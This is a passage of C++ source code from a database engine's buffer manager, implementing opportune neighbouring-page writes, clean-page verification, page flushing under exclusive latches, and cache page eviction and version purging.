// async flush this page
errLastFlush = ErrBFIFlushExclusiveLatchedAndPreparedBF( m_rgpbf[ ibf ], m_iorBase, qosT, fTrue );
Assert( errBFIPageFlushed == errLastFlush || errDiskTilt == errLastFlush );
if( errDiskTilt == errLastFlush )
{
Assert( m_rgpbf[ ibf ]->sxwl.FOwnExclusiveLatch() );
break;
}
Assert( errBFIPageFlushed == errLastFlush );
}
if ( ibf < cbfUseful )
{
// We have failed to flush all BFs ... run back any other BFs ...
Assert( errDiskTilt == errLastFlush );
RevertBFs_( ibf );
}
if ( ibf )
{
// if a single extra page was flushed, this is an opportune write IO
AtomicIncrement( ( LONG* )&cBFOpportuneWriteIssued );
}
}
}
// true -> clean pages verify, opportune write is a go.
// false -> a clean page corrupted in memory, abort completely.
bool CBFOpportuneWriter::FVerifyCleanBFs_()
{
for ( ULONG ibf = 0; ibf < m_cbfUseful; ++ibf )
{
const PBF pbf = m_rgpbf[ ibf ];
Assert( pbf->sxwl.FOwnExclusiveLatch() );
ERR errPreVerify = pbf->err;
// clean page with a bad checksum
if ( bfdfClean == pbf->bfdf )
{
// for clean pages, we may have a page that has not been derefed in a long time, and therefore
// is paged out on a already dead disk, so to make sure we don't except here, we must "freshen
// the view" properly (deref under a exception handler).
if ( !FOSMemoryPageResident( pbf->pv, CbBFIPageSize( pbf ) ) )
{
// optimization to avoid unnecessarily trading a read for a larger write
return false;
}
if ( pbf->bfat == bfatViewMapped && !FBFICacheViewFresh( pbf ) )
{
// even though we just checked residency, just in case this page was about to be reclaimed
// by OS MM, lock it down with a reference
// Passing 0 for the qosIoPriorities, because this part of Checkpoint or Scavenge writing
// and has no relation to any client APIs (so there is no User Priority Tag to pass). We
// may want however want to use qosIODispatchBackground at some point. But this would only
// affect re-paging in data to write it out - a rare case.
if ( ErrBFICacheViewFreshen( pbf, 0, *TraceContextScope( m_iorBase.Iorp() ) ) < JET_errSuccess )
{
// We could opportunistically take the write latch and update pbf->err, but
// I am going to leave the error path simple for now.
return false;
}
}
const ERR errReVerify = ErrBFIVerifyPage( pbf, CPageValidationLogEvent::LOG_NONE, fFalse );
if ( errPreVerify >= JET_errSuccess && errReVerify == JET_errPageNotInitialized )
{
// We can try and overwrite with the not initialized page, but it happens so
// rarely I would just rather take the safe route and back out of the IO ... but
// don't log an event or assert in this case.
return false;
}
if ( errReVerify != JET_errSuccess )
{
if ( errPreVerify >= JET_errSuccess )
{
UtilReportEvent( eventError,
BUFFER_MANAGER_CATEGORY,
TRANSIENT_IN_MEMORY_CORRUPTION_DETECTED_ID,
0, NULL );
EnforceSz( fFalse, "TransientMemoryCorruption" );
}
else
{
// if it's just a disk corruption that never got verified, that's actually ok.
AssertSz( fFalse, "Unexpected error here, this should have been clean by now as ErrBFIPrepareFlushPage() rejects BFs with errors." );
}
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFVerCleanRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
Assert( FBFIUpdatablePage( pbf ) );
pbf->sxwl.ReleaseExclusiveLatch();
// nullify this entry, later RevertBFs_() will skip it
m_rgpbf[ ibf ] = NULL;
return false;
}
}
}
return true;
}
ERR CBFOpportuneWriter::ErrPrepareBFForOpportuneWrite_( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
ERR err = JET_errSuccess;
Call( ErrCanAddBF_( pbf ) );
Call( ErrBFIPrepareFlushPage( pbf, bfltExclusive, m_iorBase, m_qos, fFalse ) );
// we should not fail here, and if we could we can't jump to the error clause as
// is because we would orphan a range lock.
const ERR errAddBF = ErrAddBF_( pbf );
AssertTrack( err == JET_errSuccess, OSFormat( "BFPrepOpWriteErr:%d", err ) );
AssertTrack( errAddBF == JET_errSuccess, OSFormat( "BFPrepOpWriteErrAddBf:%d", errAddBF ) );
return err;
HandleError:
return err;
}
void CBFOpportuneWriter::GetFlushableNeighboringBFs_( const IFMP ifmp, const PGNO pgno, const INT iDelta )
{
Assert( 1 == iDelta || -1 == iDelta );
PBF pbf = NULL;
BOOL fMustReleaseLatch = fFalse;
PGNO pgnoOpp = pgno + iDelta;
while ( fTrue )
{
// Determine if the BF is in the cache
BFHash::CLock lock;
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgnoOpp ), &lock );
PGNOPBF pgnopbf;
BFHash::ERR errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
g_bfhash.ReadUnlockKey( &lock );
if ( errHash != BFHash::ERR::errSuccess )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to cache miss on page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not in cache
}
pbf = pgnopbf.pbf;
// Acquire x-latch
if ( ErrBFIAcquireExclusiveLatchForFlush( pbf, fFalse ) < JET_errSuccess )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to un-latcheable page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not ready for IO
}
Assert( pbf->sxwl.FOwnExclusiveLatch() );
fMustReleaseLatch = fTrue;
// Now that we have the x-latch, make sure it hasn't changed and it's still in a valid state
if ( ( pbf->ifmp != ifmp ) || ( pbf->pgno != pgnoOpp ) || // BF switched to a different page.
( ( pbf->bfdf < bfdfDirty ) && ( !pbf->fCurrentVersion || pbf->fOlderVersion ) ) ) // Page got versioned, avoid flushing non-dirty, just in case
// newer versions got flushed and this older version has not
// been removed from the chain yet.
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to current buffer state page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not ready for IO
}
// Determine if the BF is prepared enough for writing
if ( JET_errSuccess != ErrPrepareBFForOpportuneWrite_( pbf ) )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to un-preparable page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not ready for IO
}
OSTrace( JET_tracetagBufferManager, OSFormat( "Opportune write on page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
fMustReleaseLatch = fFalse;
pgnoOpp += iDelta;
}
if ( fMustReleaseLatch )
{
Assert( pbf != NULL );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
pbf->sxwl.ReleaseExclusiveLatch();
}
// revert all the useless BFs, m_cbfUseful == index of first useless (clean) BF
RevertBFs_( m_cbfUseful );
}
void CBFOpportuneWriter::PerformOpportuneWrites( const IFMP ifmp, const PGNO pgno )
{
// perform opportunistic flush of eligible neighboring pages
//
// NOTE: we must disable ownership tracking because it is possible
// that we will try to latch a page that we already have latched
// while trying to flush an eligible neighboring page. *sigh!*
// the only reason it works is because we try-acquire the exclusive
// latch instead of acquiring it and this will work even if we
// already have the shared latch
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
GetFlushableNeighboringBFs_( ifmp, pgno, 1 );
GetFlushableNeighboringBFs_( ifmp, pgno, -1 );
// UNDONE: now we have all the BFs we want to flush latched inside m_rgpbf
// in the future development, we can sort them, we can combine them into one I/O, etc.
//
// if clean page verification passes, proceed to flush, else abort whole opportune write
if ( FVerifyCleanBFs_() )
{
// note if the disk subsystem is "tilted" this may not flush all BFs, any over disk quota
// BFs will be "reverted".
FlushUsefulBFs_();
}
else
{
RevertBFs_();
}
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
void BFIPerformOpportuneWrites( const IFMP ifmp, const PGNO pgno, IOREASON iorBase, OSFILEQOS qos )
{
const LONG cbPage = g_rgfmp[ifmp].CbPage();
const LONG cbfMax = ( LONG )UlParam( JET_paramMaxCoalesceWriteSize ) / cbPage - 1;
if ( 0 < cbfMax )
{
const LONG cbfMaxCleanRunRaw = ( LONG )UlParam( JET_paramMaxCoalesceWriteGapSize ) / cbPage;
const LONG cbfMaxCleanRun = max( 0, min( cbfMax - 2, cbfMaxCleanRunRaw ) );
// alloca a PBF array of max IO size!!
void* pv = _alloca( sizeof( CBFOpportuneWriter ) + sizeof( PBF ) * cbfMax );
if ( pv )
{
// instantiate CBFOpportuneWriter object and do the job
CBFOpportuneWriter* pPool = new ( pv ) CBFOpportuneWriter( cbfMax, cbfMaxCleanRun, iorBase, qos );
pPool->PerformOpportuneWrites( ifmp, pgno );
// destruct and validate unlatchedness
pPool->~CBFOpportuneWriter();
}
}
}
// Takes an exclusively latched BF and tries to write it
// The PBF that is passed in should be exclusively latched and PREPARED!
// On errBFIPageFlushed the exlusive latch is lost
ERR ErrBFIFlushExclusiveLatchedAndPreparedBF( __inout const PBF pbf,
__in const IOREASON iorBase,
__in const OSFILEQOS qos,
__in const BOOL fOpportune )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnExclusiveLatch() );
// Set IOREASON
TraceContextScope tcFlush( iorBase.Iorp() );
tcFlush->iorReason.AddFlag( iorBase.Iorf() );
if ( pbf->fSuspiciouslySlowRead )
{
}
if ( fOpportune )
{
tcFlush->iorReason.AddFlag( iorfOpportune );
}
if ( FBFIDatabasePage( pbf ) )
{
tcFlush->SetDwEngineObjid( ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP );
}
// schedule this page for async write
err = ErrBFIAsyncWrite( pbf, qos, *tcFlush );
if ( err < JET_errSuccess )
{
// getting force feedback from the disk ...
Assert( errDiskTilt == err );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
}
else
{
// return an error indicating that the page was flushed
err = ErrERRCheck( errBFIPageFlushed );
Assert( pbf->sxwl.FNotOwnExclusiveLatch() );
}
return err;
}
ERR ErrBFIFlushPage( __inout const PBF pbf,
__in const IOREASON iorBase,
__in const OSFILEQOS qos,
__in const BFDirtyFlags bfdfFlushMin,
__in const BOOL fOpportune,
__out_opt BOOL * const pfPermanentErr )
{
ERR err = JET_errSuccess;
if ( pfPermanentErr )
{
*pfPermanentErr = fFalse;
}
const BOOL fUnencumberedPath = ( ( 0 == ( iorBase.Iorf() & iorfForeground ) ) &&
( iorBase.Iorp() == iorpBFCheckpointAdv || iorBase.Iorp() == iorpBFAvailPool || iorBase.Iorp() == iorpBFShrink ) );
Call( ErrBFIAcquireExclusiveLatchForFlush( pbf, fUnencumberedPath ) );
Assert( !pbf->fAbandoned ); // ... or we should have failed the ErrBFIAcquireExclusiveLatchForFlush() call above.
if ( pbf->bfdf < max( bfdfFlushMin, bfdfUntidy ) )
{
// release our latch and leave
pbf->sxwl.ReleaseExclusiveLatch();
}
else
{
// See where this is passed to BFIOpportunisticallyFlushPage() - ErrBFIAcquireExclusiveLatchForFlush() should
// have completed the IO, and cleaned the page for this IORP ... so we should be in the if, just release the
// latch and return.
Expected( iorBase.Iorp() != iorpBFImpedingWriteCleanDoubleIo ||
// There is an exception though - a write failure, may mean the page stayed dirty & in err state
// causing us to attempt the double write.
( pbf->bfdf >= bfdfUntidy && pbf->err < JET_errSuccess ) );
// try to remove all dependencies on this BF. if there is an
// issue, release our latch and fail with the error
if( ( err = ErrBFIPrepareFlushPage( pbf, bfltExclusive, iorBase, qos, !fOpportune, pfPermanentErr ) ) < JET_errSuccess )
{
pbf->sxwl.ReleaseExclusiveLatch();
Call( err );
}
Enforce( pbf->pbfTimeDepChainNext == NULL );
#ifdef DEBUG
const INT ibfPage = pbf->icbPage;
#endif
Assert( ( ( qos & qosIOOptimizeCombinable ) == 0 ) || ( iorBase.Iorf() & iorfDependantOrVersion ) );
err = ErrBFIFlushExclusiveLatchedAndPreparedBF( pbf, iorBase, qos, fOpportune );
if ( errBFIPageFlushed == err )
{
if ( !fOpportune )
{
Assert( g_rgfmp[pbf->ifmp].CbPage() == g_rgcbPageSize[ibfPage] );
BFIPerformOpportuneWrites( pbf->ifmp, pbf->pgno, iorBase, OSFILEQOS( qos | qosIOOptimizeCombinable ) );
}
}
else if ( errDiskTilt == err )
{
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFFlushRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
pbf->sxwl.ReleaseExclusiveLatch();
Call( err );
}
else
{
EnforceSz( fFalse, OSFormat( "UnexpectedFlushFailure:%d", err ) ); // not even success is expected
}
}
HandleError:
Assert( pbf->sxwl.FNotOwner() ); // specific risk is exclusive latch ...
return err;
}
bool FBFICompleteFlushPage( _Inout_ PBF pbf, _In_ const BFLatchType bflt, _In_ const BOOL fUnencumberedPath, _In_ const BOOL fCompleteRemapReVerify, _In_ const BOOL fAllowTearDownClean )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
if ( wrnBFPageFlushPending != pbf->err )
{
// we weren't even undergoing IO, so we can't have completed flush page ...
return fFalse;
}
if ( ErrBFIWriteSignalState( pbf ) != wrnBFPageFlushPending )
{
Assert( wrnBFPageFlushPending == pbf->err );
// complete the state transition associated with the write IO ...
BFIFlushComplete( pbf, bflt, fUnencumberedPath, fCompleteRemapReVerify, fAllowTearDownClean );
Assert( wrnBFPageFlushPending != pbf->err );
Assert( FBFIUpdatablePage( pbf ) );
Assert( errBFIPageRemapNotReVerified != pbf->err || !fCompleteRemapReVerify );
// Note: at this point the BF may be in a read IO error state due to remap under ViewCache
}
// even though we dropped the virtual lock by unsetting wrnBFPageFlushPending in the BF::err, we still
// have the x- or w-latch in this code path.
return wrnBFPageFlushPending != pbf->err;
}
INLINE BOOL FBFIIsCleanEnoughForEvict( const PBF pbf )
{
return ( pbf->bfdf < bfdfDirty );
}
void BFIFlagDependenciesImpeding( PBF pbf )
{
g_critBFDepend.Enter();
// Note setting this flag in the overscan range makes sense to affect
// write unlatch, but not necessarily exclusive latch when calling
// BFIOpportunisticallyVersionPage(). Hmmm ...
// This is technically a little aggressive ... we could base this off
// lgposModify.
pbf->bfbitfield.SetFImpedingCheckpoint( fTrue );
// Also flag all his dependants as impeding.
(void)PbfBFIGetFlushOrderLeaf( pbf, fTrue );
g_critBFDepend.Leave();
}
// Removes all clean versions linked to this version.
//
// This chain of clean versions happens when while writing a clean page another
// thread comes into w-latch / dirty the page, and thus versions the page to
// avoid waiting for IO to complete.
// Note: Can fail due to latch conflicts or dirty buffers.
ERR ErrBFIEvictRemoveCleanVersions( PBF pbf )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
g_critBFDepend.Enter();
PBF pbfLast = pbfNil;
// potential improvement, use a stack or something to avoid O(n^2) resetting
// behavior here. But this is the super safe approach b/c we let go of
// g_critBFDepend at end of loop, and always re-establish from pbf.
while ( ( pbfLast = PbfBFIGetFlushOrderLeaf( pbf, fFalse ) ) &&
pbfLast != pbf &&
FBFIIsCleanEnoughForEvict( pbfLast ) )
{
Assert( pbfLast->pbfTimeDepChainNext == NULL );
// Must only try latch to avoid deadlock.
CSXWLatch::ERR errSXWL = pbfLast->sxwl.ErrTryAcquireExclusiveLatch();
if ( CSXWLatch::ERR::errSuccess == errSXWL )
{
if ( !FBFIUpdatablePage( pbfLast ) )
{
// Unfortunately this clean page is still being written
// and so can not be removed.
pbfLast->sxwl.ReleaseExclusiveLatch();
Error( ErrERRCheck( errBFIRemainingDependencies ) );
}
#ifndef RTM
const PBF pbfPrev = pbfLast->pbfTimeDepChainPrev;
AssertRTL( pbfPrev && pbfPrev->pbfTimeDepChainNext );
#endif
// Remove the (clean) versions.
BFICleanVersion( pbfLast, fFalse );
// We should make sure we are at least making progress ...
AssertRTL( pbfLast->pbfTimeDepChainPrev == NULL );
AssertRTL( pbfPrev && pbfPrev->pbfTimeDepChainNext == NULL );
pbfLast->sxwl.ReleaseExclusiveLatch();
}
else
{
// remember that user threads should not have any access to this older
// version of the buffer, and so we should not be able to endlessly
// deadlock if someone continously call this.
Assert( CSXWLatch::ERR::errLatchConflict == errSXWL );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// Give others a chance to visit the great land of dependencies.
g_critBFDepend.Leave();
g_critBFDepend.Enter();
}
if ( pbfLast != pbf || pbf->pbfTimeDepChainNext )
{
// A time dependency remains, probably not cleanable pbf is in chain
// Note: Today this we think can't happen, would require a chain like:
// g_bfhash->clean bf->dirty bf.
Assert( !FBFIIsCleanEnoughForEvict( pbf ) );
Error( ErrERRCheck( errBFIRemainingDependencies ) );
}
HandleError:
g_critBFDepend.Leave();
return err;
}
// This attempts to evict a page from the cache.
ERR ErrBFIEvictPage( PBF pbf, BFLRUK::CLock* plockLRUK, const BFEvictFlags bfefDangerousOptions )
{
ERR err = JET_errSuccess;
BOOL fOwnsHash = fFalse;
BOOL fOwnsLatch = fFalse;
BFEvictFlags bfefTraceOnly = bfefNone;
const BOOL fEvictDirty = ( 0 != ( bfefDangerousOptions & bfefEvictDirty ) );
const BOOL fAllowTearDownClean = ( 0 != ( bfefDangerousOptions & bfefAllowTearDownClean ) );
Assert( bfefDangerousOptions & bfefReasonMask ); // should always have a reason
Expected( ( bfefDangerousOptions & bfefTraceMask ) == 0 );
const INT iEvictReason = ( bfefDangerousOptions & bfefReasonMask );
Assert( iEvictReason ); // all evict reasons are non-zero
Assert( iEvictReason >= bfefReasonMin && iEvictReason < bfefReasonMax );
//
// Eviction Acquire all Needed Locks
//
// write lock this IFMP / PGNO in the hash table to prevent new
// latch attempts on this BF
BFHash::CLock lockHash;
g_bfhash.WriteLockKey( IFMPPGNO( pbf->ifmp, pbf->pgno ), &lockHash );
fOwnsHash = fTrue;
// no one currently owns or is waiting to own the latch on this BF
// (we tell this by trying to acquire the Write Latch)
if ( pbf->sxwl.ErrTryAcquireWriteLatch() != CSXWLatch::ERR::errSuccess )
{
// someone owns or is waiting to own a latch on this BF
// we can not evict this page because of a latch conflict
// if the page is undergoing a read operation (fault pending),
// then return that specifically, or its "hung" version.
// even though we do not have the latch at this point, the latch
// would be released in case of any errors anyways, so the check
// is always subject to timing.
if ( pbf->err == errBFIPageFaultPending )
{
Error( FBFIIsIOHung( pbf ) ? ErrERRCheck( errBFIPageFaultPendingHungIO ) : ErrERRCheck( errBFIPageFaultPending ) );
}
else
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
}
Assert( pbf->sxwl.FOwnWriteLatch() );
fOwnsLatch = fTrue;
AssertTrack( pbf->err != JET_errFileIOBeyondEOF, "BFIEvictPageEof" );
// Normally, we won't loop below, but the loop is necessary because the flush completion
// path releases both the BF hash lock and the page lock, so we need to re-check for pending
// flushes once we re-acquire the locks.
OnDebug( INT cCompleteFlushAttempts = 0 );
while ( !FBFIUpdatablePage( pbf ) )
{
OnDebug( cCompleteFlushAttempts++ );
Expected( cCompleteFlushAttempts <= 10 );
// I think we will have problems if we're actually trying to evict a page undergoing IO.
Assert( !fEvictDirty );
// Need to release the BF hash to complete the flush.
g_bfhash.WriteUnlockKey( &lockHash );
fOwnsHash = fFalse;
// Complete the flush on the spot.
if ( FBFICompleteFlushPage( pbf, bfltWrite, fFalse, fTrue, fAllowTearDownClean ) )
{
Assert( FBFIUpdatablePage( pbf ) );
bfefTraceOnly |= bfefTraceFlushComplete;
pbf->sxwl.ReleaseWriteLatch();
fOwnsLatch = fFalse;
g_bfhash.WriteLockKey( IFMPPGNO( pbf->ifmp, pbf->pgno ), &lockHash );
fOwnsHash = fTrue;
if ( pbf->sxwl.ErrTryAcquireWriteLatch() != CSXWLatch::ERR::errSuccess )
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
fOwnsLatch = fTrue;
}
else
{
// we cannot evict this page because a flush is pending
Error( ErrBFIFlushPendingStatus( pbf ) );
}
}
// Note you can check this outside of g_critBFDepend, because we only add versions at
// the head of the chain, and if we remove a version after we checked, then the called
// function will make the right decision from within g_critBFDepend.
if ( pbf->pbfTimeDepChainNext != NULL )
{
// we want to remove any clean versions below this
(void)ErrBFIEvictRemoveCleanVersions( pbf );
// we do not care about errors, we will then fall to the next if clause and decide if it
// is appropriate to evict something with an older version.
}
// the BF doesn't have a hashed latch
if ( !FBFILatchDemote( pbf ) )
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
// the BF has no older versions (otherwise we pitch this
// out and let flush page clean this up first) and this BF
// is clean / untidy or we are allowed to evict dirty BFs
if ( ( !FBFIIsCleanEnoughForEvict( pbf ) || ( pbf->pbfTimeDepChainNext != NULL ) ) && !fEvictDirty )
{
Error( ErrERRCheck( errBFIPageDirty ) );
}
// we currently have this BF locked in the LRUK
Enforce( pbf->pbfTimeDepChainNext == NULL || fEvictDirty );
PBF pbfLocked;
if ( g_bflruk.ErrGetCurrentResource( plockLRUK, &pbfLocked ) != BFLRUK::ERR::errSuccess )
{
// we currently do not have this BF locked in the LRUK
Error( ErrERRCheck( errBFLatchConflict ) );
}
Enforce( pbf == pbfLocked );
//
// Eviction Point of No Return ... clear the page out
//
// determine if we will save the history for this BF. we only
// want to save history for the current version of a page that
// was actually touched (i.e. validated) and is not being
// purged (inferred via fEvictDirty)
const BOOL fKeepHistory = !fEvictDirty &&
pbf->fCurrentVersion &&
pbf->err != errBFIPageNotVerified &&
!BoolParam( JET_paramEnableViewCache );
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
if ( fKeepHistory )
{
bfefTraceOnly |= bfefKeepHistory;
}
// before we modify these, check ...
Assert( pbf->fCurrentVersion != pbf->fOlderVersion );
// remove this BF from the IFMP / PGNO hash table if it is the
// current version of the page
const BOOL fCurrentVersion = pbf->fCurrentVersion;
if ( pbf->fCurrentVersion )
{
Assert( !( bfefNukePageImage == ( bfefDangerousOptions & bfefNukePageImage ) ) );
pbf->fCurrentVersion = fFalse;
BFHash::ERR errHash = g_bfhash.ErrDeleteEntry( &lockHash );
Assert( errHash == BFHash::ERR::errSuccess );
}
// set up trace eviction flags
if ( pbf->err == errBFIPageNotVerified )
{
bfefTraceOnly |= bfefTraceUntouched;
}
if ( pbf->lrukic.kLrukPool() == 2 )
{
bfefTraceOnly |= bfefTraceK2;
}
if ( pbf->bfrs == bfrsNotResident )
{
bfefTraceOnly |= bfefTraceNonResident;
}
if ( pbf->lrukic.FSuperColded() )
{
bfefTraceOnly |= bfefTraceSuperColded;
}
// trace eviction info before releasing the BF hash because after that happens, the page
// can technically be cached again and a cache trace may be logged prior to the eviction
// trace
Assert( !fCurrentVersion || !pbf->fOlderVersion ); // both can't be set, though sometimes neither is set??
Assert( ( bfefDangerousOptions & bfefTraceOnly ) == 0 ); // super confusing to have overlapping behavior and trace-only flags
BFITraceEvictPage( pbf->ifmp, pbf->pgno, fCurrentVersion, pbf->err, bfefDangerousOptions | bfefTraceOnly );
// release our write lock on this IFMP / PGNO
g_bfhash.WriteUnlockKey( &lockHash );
fOwnsHash = fFalse;
// we are past the point of no return, begin updating statistics / perf counters
// we don't update perf counters when we cleanup a lingering cached pages
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
const BOOL fCurrentlyAttached = ( pbffmp && pbffmp->fCurrentlyAttached );
if ( fCurrentlyAttached )
{
// evicting pre-read untouched
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheEvictUntouched.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "Evicted untouched preread page=[0x%x:0x%x]", (ULONG)pbf->ifmp, pbf->pgno ) );
}
// evicting regular k=1 or k=2 touched page
#ifndef MINIMAL_FUNCTIONALITY // no perfmon, no point
const ULONG k = pbf->lrukic.kLrukPool();
switch ( k )
{
case 1:
PERFOpt( cBFCacheEvictk1.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
case 2:
PERFOpt( cBFCacheEvictk2.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
default:
AssertSz( fFalse, "k(%d) Touch not 1 or 2, BF confused.", k );
}
#endif
// track if this is a evicted non-resident page
if ( pbf->bfrs == bfrsNotResident )
{
// should we do anything with bfrsNotCommitted or bfrsNewlyCommitted?
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentEvicted ) );
}
// track why we evicted the pages
Assert( iEvictReason >= 0 && iEvictReason < bfefReasonMax );
if ( iEvictReason >= 0 &&
iEvictReason < ( bfefReasonMax ) )
{
PERFOpt( rgcBFCacheEvictReasons[iEvictReason].Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
if ( pbf->lrukic.FSuperColded() )
{
if ( pbf->fOlderVersion )
{
// the only internal reason for super colding is older versioned pages
PERFOpt( cBFCacheEvictScavengeSuperColdInternal.Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
else
{
PERFOpt( cBFCacheEvictScavengeSuperColdUser.Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
}
}
else
{
PERFOpt( g_cbCacheUnattached -= CbBFIBufferSize( pbf ) );
}
pfmp->LeaveBFContextAsReader(); // now we're done with inst references, release IFMP
// remove this BF from the LRUK
BFLRUK::ERR errLRUK = g_bflruk.ErrEvictCurrentResource( plockLRUK, IFMPPGNO( pbf->ifmp, pbf->pgno ), fKeepHistory );
Assert( errLRUK == BFLRUK::ERR::errSuccess );
// remove this BF from the Oldest Begin0 index
//
// NOTE: we usually do this during Idle Flush or Checkpoint
// Advancement. However, we must do this on Evict to enable
// runtime verification of Flush and Purge and to allow us to
// delete or BF FMP Context when an FMP is completely Purged
BFIResetLgposOldestBegin0( pbf );
// force this BF to be clean, purging any dependencies
BFICleanPage( pbf, bfltWrite, fAllowTearDownClean ? bfcfAllowTearDownClean : bfcfNone );
// it should not be part of a dependency chain at this point because we're about to evict it,
// which would make the dependent and dependent-upon buffers point to an evicted buffer.
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
// if this was an older version, decrement versioned pages count
if ( pbf->fOlderVersion )
{
Assert( !fCurrentVersion );
#ifdef DEBUG
PGNOPBF pgnopbf;
BFHash::CLock lock;
g_bfhash.ReadLockKey( IFMPPGNO( pbf->ifmp, pbf->pgno ), &lock );
if ( g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf ) == BFHash::ERR::errSuccess )
{
Assert( pbf != pgnopbf.pbf );
}
g_bfhash.ReadUnlockKey( &lock );
#endif // DEBUG
pbf->fOlderVersion = fFalse;
PERFOpt( AtomicDecrement( (LONG*)&g_cBFVersioned ) );
}
// trace that we have just evicted a page
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManagerBufferCacheState,
OSFormat( "Evicted page=[0x%x:0x%x], tce=%d", (ULONG)pbf->ifmp, pbf->pgno, pbf->tce ) );
// update DBA statistics
//
// we measure cache-pressure by counting the number the Allocs
// where pbf->fNewlyEvicted == fTrue. the idea is that evicting
// is not considered cache pressure; only repurposing something that
// you cared about is considered cache pressure. in a simpler world,
// a page would start as fFalse, get allocated (not considered cache
// pressure i.e. we had a free page), get evicted (fNewlyEvicted = fTrue),
// get reused for something new (fNewlyEvicted = fFalse; but this
// *is* considered cache pressure).
//
// to handle those cases; Evict should do
// pbf->fNewlyEvicted = fTrue;
//
// two operations: BFPurge and MarkAsSuperCold are special in that
// they happen before Evict gets called but want to be treated as if
// the memory is freshly allocated. so instead of using a different
// bit to track that state, we re-use this one.
//
// specifically, we toggle this flag because we want the ability to
// exclude some pages from counting as newly evicted pages
// once they are reused. such pages have this flag set before
// they are evicted while they still contain valid data
//
// thus, if the state was fTrue coming in; that's a coded signal
// that reuse of this page does not mean cache pressure.
pbf->fNewlyEvicted = !pbf->fNewlyEvicted;
#ifdef DEBUG
if ( bfefNukePageImage == ( bfefDangerousOptions & bfefNukePageImage ) )
{
// Kabloowiieee!!!
memset( pbf->pv, 0xFF, CbBFIBufferSize( pbf ) );
}
#endif
// if we are mapping views then release the page buffer
BFICacheIUnmapPage( pbf );
Assert( pbf->bfat == bfatNone || !UlParam( JET_paramEnableViewCache ) );
// free this BF to the avail pool
const BOOL fQuiesce = ( bfefDangerousOptions & bfefQuiesce ) != 0;
Expected( !fQuiesce || ( bfefDangerousOptions & bfefReasonShrink ) );
BFIFreePage( pbf, fFalse, fQuiesce ? bffpfQuiesce : bffpfNone );
fOwnsLatch = fFalse; // BFIFreePage releases ownership ...
Assert( JET_errSuccess == err );
HandleError:
if ( fOwnsHash )
{
// release our write lock on this IFMP / PGNO
g_bfhash.WriteUnlockKey( &lockHash );
fOwnsHash = fFalse;
}
if ( fOwnsLatch )
{
// release our write latch on this BF
pbf->sxwl.ReleaseWriteLatch();
fOwnsLatch = fFalse;
}
return err;
}
// Purges a page and all its versions from the cache, including the current version.
// The page passed in must be the current version and must already be marked abadoned.
void BFIPurgeAllPageVersions( _Inout_ BFLatch* const pbfl, const TraceContext& tc )
{
PBF pbf = PbfBFILatchContext( pbfl->dwContext );
Assert( FBFIOwnsLatchType( pbf, bfltWrite ) );
OnDebug( const IFMP ifmp = pbf->ifmp );
OnDebug( const PGNO pgno = pbf->pgno );
EnforceSz( pbf->fAbandoned, "PurgeAllInitNotAbandoned" );
EnforceSz( pbf->fCurrentVersion, "PurgeAllInitNotCurrent" );
EnforceSz( !pbf->fOlderVersion, "PurgeAllInitOlder" );
// First, we're going to latch all versions and mark them as abandoned.
// This technically isn't required because we're going to properly purge
// one-by-one down below, but since we have asserts, enforces and protection
// against latching and writing abandoned pages, we're going to flag them all
// so that they trigger those protections if someone tries to to latch or write
// them out.
